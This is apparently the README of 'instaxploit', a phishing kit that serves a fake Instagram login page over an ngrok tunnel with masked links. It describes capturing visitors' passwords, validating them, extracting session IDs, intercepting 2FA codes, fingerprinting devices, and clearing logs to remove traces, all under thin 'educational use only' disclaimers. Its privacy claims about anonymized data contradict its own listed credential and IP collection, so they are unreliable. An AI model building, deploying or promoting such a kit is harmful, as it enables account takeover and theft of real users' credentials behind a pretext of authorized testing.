A comprehensive security testing framework for educational and authorized penetration testing purposes
THIS SOFTWARE IS FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY
- ✅ AUTHORIZED USE ONLY: This tool is designed for legitimate security professionals, researchers, and students
- ✅ EDUCATIONAL PURPOSE: Use only in controlled environments for learning cybersecurity concepts
- ✅ PENETRATION TESTING: Only use with explicit written permission from system owners
- ❌ NO MALICIOUS USE: Any unauthorized or malicious use is strictly prohibited
- ❌ NO ILLEGAL ACTIVITIES: Users are responsible for compliance with all applicable laws
Before using this software, ensure you have:
- Written authorization from the target system owner
- Proper legal documentation for penetration testing
- Understanding of applicable cybersecurity laws in your jurisdiction
- Ethical approval if used in academic research
The developers assume NO responsibility for misuse of this software. Users are solely responsible for their actions.
- Instagram Login Simulation: Realistic Instagram login page for phishing awareness training
- Credential Verification: Backend validation of usernames and passwords for educational analysis
- Session Management: Session ID extraction and management for security research
- Two-Factor Authentication: Complete 2FA workflow simulation including code verification
- CSRF Token Handling: Advanced token management for comprehensive security testing
- IP Address Tracking: Visitor IP address collection and geolocation
- System Information: Operating system, browser, and device detection
- Hardware Fingerprinting: Device model, screen resolution, and hardware specifications
- Network Analysis: Connection speed, ISP information, and network characteristics
- Privacy Protection: Data anonymization and range estimation for ethical use
- Real-time Dashboard: Live monitoring of visitor activity and interactions
- Session Tracking: Persistent session management with detailed logging
- Rich CLI Interface: Professional command-line interface with progress indicators
- Automated Reporting: Comprehensive security assessment reports and analytics
- Tunnel Management: Secure ngrok integration for remote access and testing
Professional command-line interface with portforwarding testing options
*Link Masks According to you *
Monitoring the real time data fetched by link
Detailed security assessment reports and analytics
- Python 3.13.5 or higher
- pip package manager
- Administrative privileges (for network monitoring)
Click here to download the latest ZIP
Download this repo in windows and run bat file setup_instaxploit.bat after setup you will find run_instaxploit.bat in folder use always this for launcher
-
Start the Application
python main.py
-
Select Operation Mode
- Start Monitoring: Begin Instagram phishing simulation
- Clear Logs: Remove all activity traces
- Setup Tunnel: Configure ngrok tunnel for remote access
- Exit: Terminate application
-
Access the Simulation
- Navigate to the provided local or tunnel URL
- Instagram login page will be served to visitors
- Monitor real-time activity through the CLI dashboard
- Victim Access: User visits the Instagram simulation page
- Credential Collection: Login credentials are captured and verified
- Session Extraction: Valid sessions generate session IDs for analysis
- 2FA Handling: If 2FA is enabled, the system presents the 2FA page
- Token Management: CSRF tokens are handled automatically
- Data Logging: All interactions are logged for security analysis
The tool collects the following information for educational analysis:
System Information:
- IP Address and Geolocation
- Operating System and Version
- Browser Type and Version
- Device Model and Hardware Specs
- Screen Resolution and Display Info
Session Data:
- Login Credentials (for verification)
- Session IDs (when authentication succeeds)
- 2FA Codes (if applicable)
- CSRF Tokens and Security Headers
- Interaction Timestamps and Patterns
- Cybersecurity education and training
- Social engineering awareness programs
- Network security coursework
- Ethical hacking certification preparation
- Security team training exercises
- Penetration testing skill development
- Incident response simulation
- Security awareness programs
- Cybersecurity research projects
- Vulnerability assessment studies
- Security tool development
- Academic thesis research
- Anonymization: All collected data is anonymized by default
- Encryption: Sensitive data is encrypted at rest and in transit
- Minimal Collection: Only necessary data is collected
- Automatic Cleanup: Data is automatically purged after sessions
- IP address range estimation instead of exact IPs
- Device model generalization
- Operating system version ranges
- Network speed approximations
- Always obtain proper authorization
- Respect privacy and data protection laws
- Use only for legitimate security purposes
- Document all testing activities
- ✅ Educational use permitted
- ✅ Research use permitted
- ✅ Authorized security testing permitted
- ❌ Commercial use requires permission
- ❌ Malicious use prohibited
- ❌ Unauthorized testing prohibited
- 📧 Contact: telegram @sincryptzork
If you discover a security vulnerability, please:
- DO NOT create a public issue msg me on telegram @sincryptzork
- Include detailed information about the vulnerability
- Allow time for responsible disclosure
⚡ Built with ❤️ for the cybersecurity community